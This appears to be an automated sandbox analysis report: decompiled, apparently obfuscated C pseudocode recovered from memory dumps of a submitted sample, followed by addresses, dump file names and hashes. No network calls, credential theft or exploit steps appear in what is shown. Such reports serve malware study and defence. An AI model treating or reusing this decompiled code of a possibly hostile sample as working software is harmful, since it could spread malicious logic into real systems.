                                                                                                                                                                                                                                                    					_t603 =  *0x116dee0; // 0x0
                                                                                                                                                                                                                                                    					 *(_t958 - 0x1c) = _t603 |  *( *(_t958 + 0x38) + ( *(_t958 + 0x48) << 2) * 4);
                                                                                                                                                                                                                                                    					 *(_t958 - 0x18) =  *( *((intOrPtr*)(_t958 + 0x78)) +  *(_t958 + 0x5c) * 2) & 0x0000ffff;
                                                                                                                                                                                                                                                    					 *(_t958 + 0x2c) =  *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x34)) + 0x1624));
                                                                                                                                                                                                                                                    					_t607 =  *0x116df04; // 0x0
                                                                                                                                                                                                                                                    					 *(_t958 + 0x30) =  *(_t607 + ( *0x116def4 & 0x0000ffff) * 4) ^ 0x00000668;
                                                                                                                                                                                                                                                    					 *(_t958 - 0x14) =  *(_t958 + 0x5c);
                                                                                                                                                                                                                                                    					_t612 = E010E5000( *(_t958 + 0x28) & 0x0000ffff,  *(_t958 - 0x2c),  *(_t958 - 0x28),  *((intOrPtr*)(_t958 - 0x24)),  *(_t958 - 0x20),  *(_t958 - 0x1c),  *(_t958 - 0x18),  *(_t958 + 0x2c) & 0x0000ffff,  *(_t958 + 0x30) & 0x0000ffff,  *(_t958 - 0x14));
                                                                                                                                                                                                                                                    					_t758 =  *0x116df30; // 0x0
                                                                                                                                                                                                                                                    					 *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x40)) + _t758 * 4)) = _t612;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t958 - 0x34)) = 0xe55;
                                                                                                                                                                                                                                                    					 *(_t958 - 0x30) =  *(_t958 + 0x5c);
                                                                                                                                                                                                                                                    					( *(_t958 + 0x3c))[( *( *(_t958 + 0x3c)) & 0x000000ff) + 0x1f] = E010E7E80( *((intOrPtr*)(_t958 - 0x34)),  *(_t958 - 0x30));
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t958 - 0x44)) =  *((intOrPtr*)( *((intOrPtr*)(_t958 + 8)) +  *( *(_t958 + 0x70)) * 3 * 4));
                                                                                                                                                                                                                                                    					 *(_t958 - 0x40) =  *(_t958 + 0x68) *  *(_t958 + 0x5c);
                                                                                                                                                                                                                                                    					 *(_t958 + 0x68) =  *(_t958 + 0x68) + 1;
                                                                                                                                                                                                                                                    					_t618 =  *0x116dee0; // 0x0
                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                    					 *(_t958 - 0x3c) = _t618 %  *(_t958 + 0x5c);
                                                                                                                                                                                                                                                    					 *(_t958 - 0x38) = ( *(_t958 + 0x70))[ *( *(_t958 + 0x54)) & 0x000000ff];
                                                                                                                                                                                                                                                    					 *(_t958 + 0x54) =  *(_t958 + 0x54) - 1;
                                                                                                                                                                                                                                                    					_push( *(_t958 - 0x38));
                                                                                                                                                                                                                                                    					_push( *(_t958 - 0x3c));
                                                                                                                                                                                                                                                    					_push( *(_t958 - 0x40));
                                                                                                                                                                                                                                                    					_push( *((intOrPtr*)(_t958 - 0x44)));
                                                                                                                                                                                                                                                    					_t624 = E010D4250();
                                                                                                                                                                                                                                                    					_t961 = _t961 + 0x48;
                                                                                                                                                                                                                                                    					 *0x116df38 = _t624;
                                                                                                                                                                                                                                                    					 *( *(_t958 + 0x10) +  *(_t958 + 0x5c) * 2) = ( *( *_t958 +  *( *(_t958 + 0x70)) + 0x14) & 0x000000ff) - ( *( *(_t958 + 0x10) +  *(_t958 + 0x5c) * 2) & 0x0000ffff);
                                                                                                                                                                                                                                                    					_t629 =  *0x116df34; // 0x0
                                                                                                                                                                                                                                                    					if(_t629 >=  *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x6c)) +  *(_t958 + 0x5c) * 4)) ||  *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x7c)) + 0x2c +  *(_t958 + 0x5c) * 4)) >= ( *(_t958 + 0x5b) & 0x000000ff)) {
                                                                                                                                                                                                                                                    						if( *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x74)) + 8 +  *( *(_t958 + 0x70)) * 3 * 4)) >  *(_t958 + 0x5c)) {
                                                                                                                                                                                                                                                    							 *( *(_t958 + 0x44) +  *(_t958 + 0x5c) * 2) = ( *0x116dee5 & 0x000000ff &  *(_t958 + 0x48)) + ( *( *(_t958 + 0x44) +  *(_t958 + 0x5c) * 2) & 0x0000ffff);
                                                                                                                                                                                                                                                    							 *( *((intOrPtr*)(_t958 + 0x40)) + 0x5c + ( *(_t958 + 0x5c) << 2) * 4) =  *( *((intOrPtr*)(_t958 - 8)) +  *0x116df08) & 0x000000ff;
                                                                                                                                                                                                                                                    							 *0x116dee4 =  *( *(_t958 + 0x4c) + ( *( *(_t958 + 0x54)) & 0x000000ff) * 4);
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t958 - 0x58)) =  *(_t958 + 0x5c) -  *(_t958 + 0x5c);
                                                                                                                                                                                                                                                    							 *(_t958 - 0x54) =  *( *(_t958 + 4) + 2 +  *( *(_t958 + 0x70)) * 2) & 0x0000ffff &  *( *(_t958 + 0x4c) + 0x7c +  *(_t958 + 0x5c) * 4);
                                                                                                                                                                                                                                                    							 *(_t958 + 0x70) =  *(_t958 + 0x70) - 4;
                                                                                                                                                                                                                                                    							_t781 =  *0x116def8; // 0x0
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t958 - 0x50)) = _t781;
                                                                                                                                                                                                                                                    							 *(_t958 - 0x4c) =  *( *((intOrPtr*)(_t958 + 0x6c)) + 0xc +  *( *(_t958 + 0x70)) * 4) %  *(_t958 + 0x5c);
                                                                                                                                                                                                                                                    							_t936 =  *0x116df18; // 0x0
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t958 - 0x48)) = _t936 +  *(_t958 + 0x5c);
                                                                                                                                                                                                                                                    							 *(_t958 + 0x24) =  *((intOrPtr*)( *((intOrPtr*)(_t958 + 8)) +  *(_t958 + 0x5c) * 4));
                                                                                                                                                                                                                                                    							 *( *(_t958 + 0x70)) =  *( *(_t958 + 0x70)) - 1;
                                                                                                                                                                                                                                                    							_t653 = E010E6F90( *((intOrPtr*)(_t958 - 0x58)),  *(_t958 - 0x54),  *((intOrPtr*)(_t958 - 0x50)),  *(_t958 - 0x4c),  *((intOrPtr*)(_t958 - 0x48)),  *(_t958 + 0x24) & 0x0000ffff);
                                                                                                                                                                                                                                                    							_t961 = _t961 + 0x18;
                                                                                                                                                                                                                                                    							 *((short*)( *((intOrPtr*)(_t958 + 0x34)) +  *( *(_t958 + 0x70)) * 2)) = _t653;
                                                                                                                                                                                                                                                    							 *0x116ded8 = ( *( *(_t958 + 0x44) + ( *( *(_t958 + 0x54)) & 0x000000ff) * 2) & 0x0000ffff) *  *(_t958 + 0x5c) | ( *(_t958 + 0x70))[0xe97] |  *0x116ded8;
                                                                                                                                                                                                                                                    							 *(_t958 + 0x54) =  *(_t958 + 0x54) + 1;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					 *(_t958 + 0x5c) =  *(_t958 + 0x5c) + 1;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				 *(_t958 + 0x50) =  *( *((intOrPtr*)(_t958 + 0xc)) +  *0x116df08) & 0x000000ff;
                                                                                                                                                                                                                                                    				while( *(_t958 + 0x50) != ( *(_t958 + 0x5b) & 0x000000ff)) {
                                                                                                                                                                                                                                                    					_t952 =  *0x116df1c; // 0x0
                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                    					 *( *(_t958 + 0x54) +  *(_t958 + 0x50)) = (0x0000166f /  *(_t952 + 0x10 + ( *0x116def0 & 0x0000ffff) * 4) ^  *(_t958 + 0x50)) / ( *( *((intOrPtr*)(_t958 + 0xc)) +  *(_t958 + 0x50)) & 0x000000ff) ^  *( *(_t958 + 0x54) +  *(_t958 + 0x50)) & 0x000000ff;
                                                                                                                                                                                                                                                    					 *(_t958 - 0x6c) =  *( *(_t958 + 4) +  *( *(_t958 + 0x70)) * 2) & 0x0000ffff;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t958 - 0x68)) = 0xedb;
                                                                                                                                                                                                                                                    					 *(_t958 - 0x64) =  *(_t958 + 0x50);
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t958 - 0x60)) = ( *( *(_t958 + 0x10) + 0x1072) & 0x0000ffff) +  *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x7c)) + ( *(_t958 + 0x50) << 2) * 4));
                                                                                                                                                                                                                                                    					 *(_t958 - 0x5c) =  *( *((intOrPtr*)(_t958 + 0x74)) + 0x58 +  *(_t958 + 0x50) * 4) |  *0x116dee0;
                                                                                                                                                                                                                                                    					_t862 =  *0x116df10; // 0x0
                                                                                                                                                                                                                                                    					 *0x116df10 = _t862 + 1;
                                                                                                                                                                                                                                                    					 *(_t958 + 0x20) = ( *( *((intOrPtr*)(_t958 + 0x34)) + 0x15d4) & 0x0000ffff) *  *0x116df10;
                                                                                                                                                                                                                                                    					_t570 = E010E6F90( *(_t958 - 0x6c),  *((intOrPtr*)(_t958 - 0x68)),  *(_t958 - 0x64),  *((intOrPtr*)(_t958 - 0x60)),  *(_t958 - 0x5c),  *(_t958 + 0x20) & 0x0000ffff);
                                                                                                                                                                                                                                                    					_t961 = _t961 + 0x18;
                                                                                                                                                                                                                                                    					 *0x116df38 = _t570;
                                                                                                                                                                                                                                                    					_t953 =  *0x116df04; // 0x0
                                                                                                                                                                                                                                                    					_t716 =  *0x116df04; // 0x0
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t716 +  *0x116df30 * 3 * 4)) =  *( *((intOrPtr*)(_t958 + 0x7c)) + ( *( *(_t958 + 0x54)) & 0x000000ff) * 4) -  *((intOrPtr*)(_t953 +  *0x116df30 * 3 * 4));
                                                                                                                                                                                                                                                    					 *(_t958 + 0x54) =  *(_t958 + 0x54) + 1;
                                                                                                                                                                                                                                                    					( *(_t958 + 0x70))[ *(_t958 + 0x48)] = ( *0x116df2c & 0x0000ffff) *  *( *((intOrPtr*)(_t958 + 0x74)) +  *(_t958 + 0x50) * 4) - ( *( *_t958 +  *(_t958 + 0x48) + 0xe) & 0x000000ff) |  *( *((intOrPtr*)(_t958 - 4)) +  *( *(_t958 + 0x70)) * 4);
                                                                                                                                                                                                                                                    					_t955 =  *0x116df24; // 0x0
                                                                                                                                                                                                                                                    					 *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x7c)) +  *(_t958 + 0x50) * 4)) = ( *( *((intOrPtr*)(_t958 + 0x7c)) + 0x6790) |  *( *((intOrPtr*)(_t958 + 0x7c)) + ( *( *(_t958 + 0x54)) & 0x000000ff) * 4)) /  *(_t955 +  *( *(_t958 + 0x70)) * 4) + ( *0x116dee6 & 0x000000ff);
                                                                                                                                                                                                                                                    					 *(_t958 + 0x70) =  *(_t958 + 0x70) - 4;
                                                                                                                                                                                                                                                    					 *(_t958 + 0x54) =  *(_t958 + 0x54) + 1;
                                                                                                                                                                                                                                                    					_t584 =  *0x116df14; // 0x0
                                                                                                                                                                                                                                                    					 *0x116ded8 = (_t584 % ( *0x116df2c & 0x0000ffff) +  *(_t958 + 0x50)) /  *0x116ded8;
                                                                                                                                                                                                                                                    					 *(_t958 + 0x50) =  *(_t958 + 0x50) + 1;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_t824 =  *0x116df18; // 0x0
                                                                                                                                                                                                                                                    				 *(_t958 + 0x18) = _t824 + 0xe02;
                                                                                                                                                                                                                                                    				_t524 =  *0x116df18; // 0x0
                                                                                                                                                                                                                                                    				 *0x116df18 = _t524 - 1;
                                                                                                                                                                                                                                                    				 *(_t958 - 0x88) =  *( *((intOrPtr*)(_t958 + 0x78)) +  *(_t958 + 0x48) * 2) & 0x1c64;
                                                                                                                                                                                                                                                    				_t528 =  *0x116df18; // 0x0
                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                    				 *(_t958 - 0x84) = _t528 % 0x1c97;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t958 - 0x80)) = 0x11b6;
                                                                                                                                                                                                                                                    				_t828 =  *0x116defc; // 0x0
                                                                                                                                                                                                                                                    				_t530 =  *0x116df1c; // 0x0
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t958 - 0x7c)) =  *((intOrPtr*)(_t530 + _t828 * 4));
                                                                                                                                                                                                                                                    				 *(_t958 - 0x78) =  *( *(_t958 + 0x44) + ( *0x116def4 & 0x0000ffff) * 2) & 0x0000ffff;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t958 - 0x74)) = 0x3cb -  *((intOrPtr*)( *(_t958 + 0x4c) + ( *( *(_t958 + 0x3c)) & 0x000000ff) * 4));
                                                                                                                                                                                                                                                    				 *(_t958 + 0x14) =  *( *((intOrPtr*)(_t958 + 0xc)) + ( *0x116def4 & 0x0000ffff)) & 0x000000ff;
                                                                                                                                                                                                                                                    				 *(_t958 + 0x1c) = ( *( *((intOrPtr*)(_t958 - 8)) +  *0x116dee0) & 0x000000ff) + 0x324;
                                                                                                                                                                                                                                                    				 *(_t958 - 0x70) =  *(_t958 + 0x68);
                                                                                                                                                                                                                                                    				 *((char*)( *(_t958 + 0x54) +  *( *(_t958 + 0x4c)))) = E010E5000( *(_t958 + 0x18) & 0x0000ffff,  *(_t958 - 0x88),  *(_t958 - 0x84),  *((intOrPtr*)(_t958 - 0x80)),  *((intOrPtr*)(_t958 - 0x7c)),  *(_t958 - 0x78),  *((intOrPtr*)(_t958 - 0x74)),  *(_t958 + 0x14) & 0x0000ffff,  *(_t958 + 0x1c) & 0x0000ffff,  *(_t958 - 0x70));
                                                                                                                                                                                                                                                    				 *((intOrPtr*)( *(_t958 + 0x38) +  *( *(_t958 + 0x70)) * 4)) =  *((intOrPtr*)( *(_t958 + 0x38) + ( *( *(_t958 + 0x54)) & 0x000000ff) * 3 * 4));
                                                                                                                                                                                                                                                    				 *((intOrPtr*)( *(_t958 + 0x4c) + 0x84 +  *( *(_t958 + 0x70)) * 4)) = ( *0x116def4 & 0x0000ffff) -  *((intOrPtr*)( *(_t958 + 0x4c) + 0x84 +  *( *(_t958 + 0x70)) * 4));
                                                                                                                                                                                                                                                    				 *(_t958 + 0x70) =  &(( *(_t958 + 0x70))[1]);
                                                                                                                                                                                                                                                    				_t848 =  *0x116df20; // 0x0
                                                                                                                                                                                                                                                    				 *(_t958 - 0x8c) =  *( *((intOrPtr*)(_t958 + 0x34)) + ( *( *(_t958 + 0x70)) << 2) * 2) & 0x0000ffff &  *(_t848 + ( *( *(_t958 + 0x54)) & 0x000000ff) * 4);
                                                                                                                                                                                                                                                    				 *(_t958 + 0x70) =  &(( *(_t958 + 0x70))[1]);
                                                                                                                                                                                                                                                    				return  *(_t958 - 0x8c);
                                                                                                                                                                                                                                                    			}







































                                                                                                                                                                                                                                                    0x010e6711
                                                                                                                                                                                                                                                    0x010e6715
                                                                                                                                                                                                                                                    0x010e6727
                                                                                                                                                                                                                                                    0x010e6737
                                                                                                                                                                                                                                                    0x010e673a
                                                                                                                                                                                                                                                    0x010e6741
                                                                                                                                                                                                                                                    0x010e674d
                                                                                                                                                                                                                                                    0x010e6750
                                                                                                                                                                                                                                                    0x010e675d
                                                                                                                                                                                                                                                    0x010e676d
                                                                                                                                                                                                                                                    0x010e6775
                                                                                                                                                                                                                                                    0x010e6782
                                                                                                                                                                                                                                                    0x010e6793
                                                                                                                                                                                                                                                    0x010e679a
                                                                                                                                                                                                                                                    0x010e67a9
                                                                                                                                                                                                                                                    0x010e67c5
                                                                                                                                                                                                                                                    0x010e67c8
                                                                                                                                                                                                                                                    0x010e67da
                                                                                                                                                                                                                                                    0x010e67ec
                                                                                                                                                                                                                                                    0x010e6805
                                                                                                                                                                                                                                                    0x010e681e
                                                                                                                                                                                                                                                    0x010e6821
                                                                                                                                                                                                                                                    0x010e682c
                                                                                                                                                                                                                                                    0x010e6840
                                                                                                                                                                                                                                                    0x010e6854
                                                                                                                                                                                                                                                    0x010e685a
                                                                                                                                                                                                                                                    0x010e6876
                                                                                                                                                                                                                                                    0x010e688a
                                                                                                                                                                                                                                                    0x010e6897
                                                                                                                                                                                                                                                    0x010e68a5
                                                                                                                                                                                                                                                    0x010e68c5
                                                                                                                                                                                                                                                    0x010e68cf
                                                                                                                                                                                                                                                    0x010e68d5
                                                                                                                                                                                                                                                    0x010e68f3
                                                                                                                                                                                                                                                    0x010e690e
                                                                                                                                                                                                                                                    0x010e6916
                                                                                                                                                                                                                                                    0x010e6925
                                                                                                                                                                                                                                                    0x010e6928
                                                                                                                                                                                                                                                    0x010e6931
                                                                                                                                                                                                                                                    0x010e693c
                                                                                                                                                                                                                                                    0x010e6945
                                                                                                                                                                                                                                                    0x010e695b
                                                                                                                                                                                                                                                    0x010e6961
                                                                                                                                                                                                                                                    0x010e6970
                                                                                                                                                                                                                                                    0x010e697e
                                                                                                                                                                                                                                                    0x010e6987
                                                                                                                                                                                                                                                    0x010e698d
                                                                                                                                                                                                                                                    0x010e6999
                                                                                                                                                                                                                                                    0x010e69a1
                                                                                                                                                                                                                                                    0x010e69ae
                                                                                                                                                                                                                                                    0x010e69c3
                                                                                                                                                                                                                                                    0x010e69ce
                                                                                                                                                                                                                                                    0x010e69dc
                                                                                                                                                                                                                                                    0x010e69e3
                                                                                                                                                                                                                                                    0x010e6a11
                                                                                                                                                                                                                                                    0x010e6a19
                                                                                                                                                                                                                                                    0x010e6a22
                                                                                                                                                                                                                                                    0x010e6a25
                                                                                                                                                                                                                                                    0x010e6a2f
                                                                                                                                                                                                                                                    0x010e6a4b
                                                                                                                                                                                                                                                    0x010e6a5b
                                                                                                                                                                                                                                                    0x010e6a65
                                                                                                                                                                                                                                                    0x010e6a6e
                                                                                                                                                                                                                                                    0x010e6a71
                                                                                                                                                                                                                                                    0x010e6a76
                                                                                                                                                                                                                                                    0x010e6a7a
                                                                                                                                                                                                                                                    0x010e6a89
                                                                                                                                                                                                                                                    0x010e6a92
                                                                                                                                                                                                                                                    0x010e6a98
                                                                                                                                                                                                                                                    0x010e6a9c
                                                                                                                                                                                                                                                    0x010e6aa0
                                                                                                                                                                                                                                                    0x010e6aa4
                                                                                                                                                                                                                                                    0x010e6aa5
                                                                                                                                                                                                                                                    0x010e6aaa
                                                                                                                                                                                                                                                    0x010e6aad
                                                                                                                                                                                                                                                    0x010e6ad1
                                                                                                                                                                                                                                                    0x010e6adb
                                                                                                                                                                                                                                                    0x010e6ae3
                                                                                                                                                                                                                                                    0x010e6b09
                                                                                                                                                                                                                                                    0x010e6b2b
                                                                                                                                                                                                                                                    0x010e6b44
                                                                                                                                                                                                                                                    0x010e6b54
                                                                                                                                                                                                                                                    0x010e6b60
                                                                                                                                                                                                                                                    0x010e6b7a
                                                                                                                                                                                                                                                    0x010e6b83
                                                                                                                                                                                                                                                    0x010e6b86
                                                                                                                                                                                                                                                    0x010e6b8c
                                                                                                                                                                                                                                                    0x010e6ba0
                                                                                                                                                                                                                                                    0x010e6ba3
                                                                                                                                                                                                                                                    0x010e6bac
                                                                                                                                                                                                                                                    0x010e6bb9
                                                                                                                                                                                                                                                    0x010e6bc8
                                                                                                                                                                                                                                                    0x010e6be3
                                                                                                                                                                                                                                                    0x010e6be8
                                                                                                                                                                                                                                                    0x010e6bf3
                                                                                                                                                                                                                                                    0x010e6c1f
                                                                                                                                                                                                                                                    0x010e6c2b
                                                                                                                                                                                                                                                    0x010e6c2b
                                                                                                                                                                                                                                                    0x010e6b09
                                                                                                                                                                                                                                                    0x010e68a2
                                                                                                                                                                                                                                                    0x010e68a2
                                                                                                                                                                                                                                                    0x010e6c3f
                                                                                                                                                                                                                                                    0x010e6c4d
                                                                                                                                                                                                                                                    0x010e6c61
                                                                                                                                                                                                                                                    0x010e6c6c
                                                                                                                                                                                                                                                    0x010e6c7d
                                                                                                                                                                                                                                                    0x010e6c91
                                                                                                                                                                                                                                                    0x010e6c9f
                                                                                                                                                                                                                                                    0x010e6ca2
                                                                                                                                                                                                                                                    0x010e6cac
                                                                                                                                                                                                                                                    0x010e6ccd
                                                                                                                                                                                                                                                    0x010e6ce0
                                                                                                                                                                                                                                                    0x010e6ce3
                                                                                                                                                                                                                                                    0x010e6cec
                                                                                                                                                                                                                                                    0x010e6d0b
                                                                                                                                                                                                                                                    0x010e6d28
                                                                                                                                                                                                                                                    0x010e6d2d
                                                                                                                                                                                                                                                    0x010e6d30
                                                                                                                                                                                                                                                    0x010e6d45
                                                                                                                                                                                                                                                    0x010e6d58
                                                                                                                                                                                                                                                    0x010e6d5e
                                                                                                                                                                                                                                                    0x010e6d67
                                                                                                                                                                                                                                                    0x010e6d98
                                                                                                                                                                                                                                                    0x010e6dbd
                                                                                                                                                                                                                                                    0x010e6dd7
                                                                                                                                                                                                                                                    0x010e6de0
                                                                                                                                                                                                                                                    0x010e6de9
                                                                                                                                                                                                                                                    0x010e6df3
                                                                                                                                                                                                                                                    0x010e6e09
                                                                                                                                                                                                                                                    0x010e6c4a
                                                                                                                                                                                                                                                    0x010e6c4a
                                                                                                                                                                                                                                                    0x010e6e13
                                                                                                                                                                                                                                                    0x010e6e1f
                                                                                                                                                                                                                                                    0x010e6e23
                                                                                                                                                                                                                                                    0x010e6e2b
                                                                                                                                                                                                                                                    0x010e6e3f
                                                                                                                                                                                                                                                    0x010e6e45
                                                                                                                                                                                                                                                    0x010e6e4a
                                                                                                                                                                                                                                                    0x010e6e52
                                                                                                                                                                                                                                                    0x010e6e58
                                                                                                                                                                                                                                                    0x010e6e5f
                                                                                                                                                                                                                                                    0x010e6e65
                                                                                                                                                                                                                                                    0x010e6e6d
                                                                                                                                                                                                                                                    0x010e6e7e
                                                                                                                                                                                                                                                    0x010e6e92
                                                                                                                                                                                                                                                    0x010e6ea4
                                                                                                                                                                                                                                                    0x010e6eba
                                                                                                                                                                                                                                                    0x010e6ec1
                                                                                                                                                                                                                                                    0x010e6f05
                                                                                                                                                                                                                                                    0x010e6f1f
                                                                                                                                                                                                                                                    0x010e6f40
                                                                                                                                                                                                                                                    0x010e6f4d
                                                                                                                                                                                                                                                    0x010e6f65
                                                                                                                                                                                                                                                    0x010e6f6e
                                                                                                                                                                                                                                                    0x010e6f7a
                                                                                                                                                                                                                                                    0x010e6f8a

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 47eb0f6d37790db613c1fc93842dac2cc4ce492001657317a35b2af452e5b577
                                                                                                                                                                                                                                                    • Instruction ID: 22115467a0d4c1a5d04efaa0d5c937a995c69c9a4ede09088bf12e948c7dd369
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47eb0f6d37790db613c1fc93842dac2cc4ce492001657317a35b2af452e5b577
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF62F674A04258CFCB28CF99D4909A9BBF2FF8D304B148159FD658B369D735E992CB40
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                                    			E010D4250() {
                                                                                                                                                                                                                                                    				signed int _t333;
                                                                                                                                                                                                                                                    				signed int _t335;
                                                                                                                                                                                                                                                    				signed int _t339;
                                                                                                                                                                                                                                                    				signed char _t351;
                                                                                                                                                                                                                                                    				signed int _t376;
                                                                                                                                                                                                                                                    				signed int _t380;
                                                                                                                                                                                                                                                    				intOrPtr _t389;
                                                                                                                                                                                                                                                    				signed int _t390;
                                                                                                                                                                                                                                                    				intOrPtr _t398;
                                                                                                                                                                                                                                                    				intOrPtr _t412;
                                                                                                                                                                                                                                                    				intOrPtr _t423;
                                                                                                                                                                                                                                                    				intOrPtr _t425;
                                                                                                                                                                                                                                                    				signed int _t435;
                                                                                                                                                                                                                                                    				signed int _t444;
                                                                                                                                                                                                                                                    				intOrPtr _t446;
                                                                                                                                                                                                                                                    				short _t459;
                                                                                                                                                                                                                                                    				signed short _t474;
                                                                                                                                                                                                                                                    				signed int _t477;
                                                                                                                                                                                                                                                    				intOrPtr _t494;
                                                                                                                                                                                                                                                    				signed int _t502;
                                                                                                                                                                                                                                                    				signed int _t510;
                                                                                                                                                                                                                                                    				intOrPtr _t513;
                                                                                                                                                                                                                                                    				intOrPtr _t522;
                                                                                                                                                                                                                                                    				signed int _t525;
                                                                                                                                                                                                                                                    				intOrPtr _t530;
                                                                                                                                                                                                                                                    				signed int _t542;
                                                                                                                                                                                                                                                    				signed int _t548;
                                                                                                                                                                                                                                                    				intOrPtr _t575;
                                                                                                                                                                                                                                                    				signed int _t577;
                                                                                                                                                                                                                                                    				intOrPtr _t581;
                                                                                                                                                                                                                                                    				intOrPtr _t594;
                                                                                                                                                                                                                                                    				signed int _t619;
                                                                                                                                                                                                                                                    				signed int* _t635;
                                                                                                                                                                                                                                                    				void* _t637;
                                                                                                                                                                                                                                                    				void* _t638;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t635 = _t637 - 0x68;
                                                                                                                                                                                                                                                    				_t638 = _t637 - 0x9c;
                                                                                                                                                                                                                                                    				_t635[0x1f] = _t635[0x1f] + 1;
                                                                                                                                                                                                                                                    				_t635[0x10] = _t635[0x1f] + _t635[0x1f];
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t635 - 0x1c)) = 0xe5f;
                                                                                                                                                                                                                                                    				_t635[0x13] = 0x1c27;
                                                                                                                                                                                                                                                    				_t635[8] = _t635[0x1f] - 0x1b62;
                                                                                                                                                                                                                                                    				_t333 =  *0x116dee0; // 0x0
                                                                                                                                                                                                                                                    				 *0x116dee0 = _t333 + 1;
                                                                                                                                                                                                                                                    				_t435 =  *0x116dee0; // 0x0
                                                                                                                                                                                                                                                    				_t522 =  *0x116df1c; // 0x0
                                                                                                                                                                                                                                                    				_t335 =  *0x116dee0; // 0x0
                                                                                                                                                                                                                                                    				_t635[0x12] = _t335 |  *(_t522 + _t435 * 4);
                                                                                                                                                                                                                                                    				_t635[0xe] = _t635[0x1f] % 0x1244;
                                                                                                                                                                                                                                                    				_t525 =  *0x116df30; // 0x0
                                                                                                                                                                                                                                                    				 *0x116df30 = _t525 + 1;
                                                                                                                                                                                                                                                    				_t339 =  *0x116df30; // 0x0
                                                                                                                                                                                                                                                    				 *(_t635 - 0x20) =  *(_t635[0x1d] + 0x5c + _t635[0x1f] * 4) &  *(_t635[0x1e] + (_t339 << 1) * 4);
                                                                                                                                                                                                                                                    				_t635[0x1f] = _t635[0x1f] - 1;
                                                                                                                                                                                                                                                    				_t530 =  *0x116df0c; // 0x0
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t635 - 0x24)) =  *((intOrPtr*)(_t530 + 0x1248)) - 0x18ed;
                                                                                                                                                                                                                                                    				 *(_t635 - 0x28) =  *0x116dee6 & 0x000000ff ^  *(_t635[0x1e] + 0x1178);
                                                                                                                                                                                                                                                    				_t635[0xd] =  *(_t635[0x1e] + (_t635[0x1f] << 2) * 4);
                                                                                                                                                                                                                                                    				_t635[0x1f] = _t635[0x1f] + 1;
                                                                                                                                                                                                                                                    				_t444 =  *0x116df38; // 0x0
                                                                                                                                                                                                                                                    				_t635[0x17] = _t444 |  *0x116def8;
                                                                                                                                                                                                                                                    				_t635[0x19] = ( *0x116dee6 & 0x000000ff) - 0x16b8;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t635 - 0x2c)) = 0x92;
                                                                                                                                                                                                                                                    				_t446 =  *0x116dedc; // 0x0
                                                                                                                                                                                                                                                    				_t635[0x18] =  *(_t446 + 4 + (( *0x116dee6 & 0x000000ff) << 2) * 4) * 0xf7b;
                                                                                                                                                                                                                                                    				_t351 =  *0x116dee6; // 0x0
                                                                                                                                                                                                                                                    				 *0x116dee6 = _t351 + 1;
                                                                                                                                                                                                                                                    				_t635[0xc] = 0x64f -  *0x116df08;
                                                                                                                                                                                                                                                    				_t635[0x14] =  *(_t635[0x1d] + _t635[0x1f] * 4) | 0x00001351;
                                                                                                                                                                                                                                                    				_t635[0xf] = (_t635[0x1c] + _t635[0x1f])[2] & 0x000000ff;
                                                                                                                                                                                                                                                    				_t635[0x1f] = _t635[0x1f] - 1;
                                                                                                                                                                                                                                                    				 *(_t635 - 0x30) = 0x6a6 /  *(_t635[0x1d] + (_t635[0x1f] << 2) * 4);
                                                                                                                                                                                                                                                    				_t542 =  *0x116defc; // 0x0
                                                                                                                                                                                                                                                    				 *0x116defc = _t542 + 1;
